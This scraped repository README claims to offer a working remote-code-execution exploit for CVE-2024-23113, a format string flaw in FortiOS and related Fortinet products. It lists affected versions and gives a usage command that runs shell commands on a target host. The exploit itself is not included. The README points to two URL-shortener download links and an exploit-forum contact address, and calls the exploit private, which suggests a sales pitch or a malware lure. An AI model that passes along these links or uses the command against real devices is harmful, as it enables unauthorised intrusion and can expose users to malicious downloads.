CVE-2024-23113 PoC — Fortinet FortiOS 格式化字符串错误漏洞

Source

Associated Vulnerability

Readme

# FortiOS and FortiProxy Format String  Vulnerability to RCE (CVE-2024-23113)

## Overview
CVE-2024-23113
The vulnerability lies in the format string, and because of it and the .py exploit, an attacker can send RCE commands without having administrator rights. Confidentiality, integrity and availability are affected.

## Exploit:
### [Download here](https://t.ly/TD_2S)

## Details

- **CVE ID**: [CVE-2024-23113](https://nvd.nist.gov/vuln/detail/CVE-2024-23113)
- **Published**: 2024-10-15
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: 9.8

## Vulnerability Description

It’s a Format String vulnerability, allows attacker to execute unauthorised code or commands via specially crafted packets.

The use of externally-controlled format string vulnerability [CWE-134] in FortiOS fgfmd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.
Allows attacker to execute unauthorized code or commands via specially crafted packets.
## Affected Versions

**Fortinet FortiOS versions**

7.4.0 through 7.4.2,
7.2.0 through 7.2.6,
7.0.0 through 7.0.13,

**FortiProxy versions**

7.4.0 through 7.4.2,
7.2.0 through 7.2.8,
7.0.0 through 7.0.14,

**FortiPAM versions**

1.2.0, 1.1.0 through 1.1.2,
1.0.0 through 1.0.3,

**FortiSwitchManager versions**

7.2.0 through 7.2.3,
7.0.0 through 7.0.3


## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact

For inquiries, please contact **cybersecuritist@exploit.in**

## Exploit:
### [Download here](https://t.ly/RfOx6)


![image](https://github.com/HazeLook/CVE-2024-23113/blob/main/CVE-2024-23113Hello.png)

File Snapshot

 [4.0K]  /data/pocs/dbb6bcb910955665b9347d318beea1a61562b048
├── [189K]  CVE-2024-23113Hello.png
└── [1.7K]  README.md

0 directories, 2 files

Remarks